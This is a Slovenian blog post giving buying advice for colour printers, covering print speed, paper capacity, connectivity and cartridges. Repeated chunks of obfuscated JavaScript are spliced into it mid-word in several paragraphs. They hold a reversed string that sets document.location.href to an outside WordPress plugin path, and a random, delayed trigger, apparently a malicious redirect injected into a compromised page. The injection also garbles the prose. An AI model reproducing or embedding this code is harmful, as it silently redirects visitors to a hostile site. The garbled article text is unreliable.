Kaj upoštevati pri izbiri barvnega tiskalnika?

By | 23 januarja, 2019

Barvni tiskalnik je dandanes obvezna oprema vsakega doma in pisarne. Prav zaradi pestre ponudbe različnih naprav na trgu, pa se kupec dostikrat sreča pred dilemo, katerega izmed vseh izbrati. Zlatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to pravilo je, da razmislite, v kolikšni meri so vas zadovoljevale lastnosti in funkcije prejšnjega tiskalnika. Te iščite tudi pri naslednjem. Po drugi strani pa se vprašajte, kaj še ponujajo sodobni tiskalniki, kar bi vam lahko prišlo prav v bodoče pa zaenkrat niste razmišljali v tej smeri. Da bi bilo vse skupaj lažje, vam bomo predstavili nekaj stvari, na katere naj bi bili pozorni.

Kapaciteta za papir in hitrost tiskanja

Ko se odločate za nov barvni tiskalnik, je hitrost tiskanja ena od pomembnih karakteristik, ki razlikujejo osnovne in naprednejše tiskalnike. Če tiskate na dnevni bazi v večjem obsegu, vam bo zelo prav prišlo, da boste imeli čim hitrejši tiskalnik. Tako vam ne bo treba čakati v nedogled. Po drugi strani čim večja kapaciteta za papir pomeni, da se boste razbremenili stalnemu ročnemu dovajanju papirja. Pri majhni kapaciteti boste morali kar naprej posegati v postoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topek tiskanja – če tiskate v večjem obsegu.

Možnost povezljivosti

Nekatere barvne tiskalnike je možno povezati v sistem z več računalniki. To je praktično sploh pri delu v pisarnah, saj lahko z enega tiskalnika tiska več zaposlenih. Na ta način se prihrani na stroških nakupa tiskalnikov. Po drugi strani se povezljivost lahko nanaša tudi na USB ali bluetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tooth povezavo. Ta nam lahko omogoči, da tiskanje ne izvajamo zgolj z računalnika, ampak tudi prek mobitela ali tablice. To je lahko zelo praktično, da nam ni treba vsega prenašati najprej na računalnik.

Kartuše

Kartuš nimajo vsi tiskalniki. Nekateri vsebujejo posebne prekate, kamor se po potrebi doliva črnilo. Sicer so taki barvni tiskalniki redki, vendar pa gre za zelo ekološko rešitev, saj ne nastaja dodatna embalaža. Hkrati pa privarčuje tudi potrošnik.

V primeru kartuš pa tudi ni enotne rešitve. Obstajajo tiskalniki, ki uporabljajo dve kartuši – črno in barvno. Ti so najosnovnejši. Potem pa še tisti, ki vsako barvo hranijo v lastni kartuši. To je značilno za naprednejše naprave.